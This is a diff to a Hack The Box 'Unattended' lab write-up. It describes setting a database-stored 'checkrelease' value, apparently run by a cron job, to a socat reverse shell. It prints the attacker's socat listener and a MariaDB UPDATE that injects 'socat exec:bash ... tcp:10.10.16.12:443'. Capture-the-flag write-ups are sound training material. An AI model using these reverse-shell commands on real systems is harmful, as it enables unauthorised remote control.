varjo/writeups/htb/unattended/Unattended.md

 |  87 | smtphost                | localhost
 ...
 ```
-`checkrelease` most of all seems like the most interesting.
-Let's assume that this script is executed periodically as a check.
-If we set this to a reverse shell, we may get control of the user running it.
+`checkrelease` is most relevant to our interests.
+Let's assume that this script is executed periodically as a backend cronjob.
+If we set this to an arbitrary command, i.e. a reverse shell, we may assume control of the owner of the process when the cron runs again.

 After some attempts to use our meterpreter shell from earlier, it appears some controls are blocking it.
-Setting the `checkrelease` values to `socat` instead does the trick.
+Living off the land by setting the `checkrelease` values to `socat` instead does the trick.

-Run a listener on our attacking machine
+Run a listener on our attacking machine:
 ```
 # socat file:`tty`,raw,echo=0 tcp-listen:443,reuseaddr
 ```

-Update `checkrelease` to our payload
+Update `checkrelease` to our payload:
 ```
 MariaDB [neddy]> update config set option_value = "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.16.12:443" where id = 86;
 err,setsid,sigint,sane tcp:10.10.16.12:443" where id = 86;y,std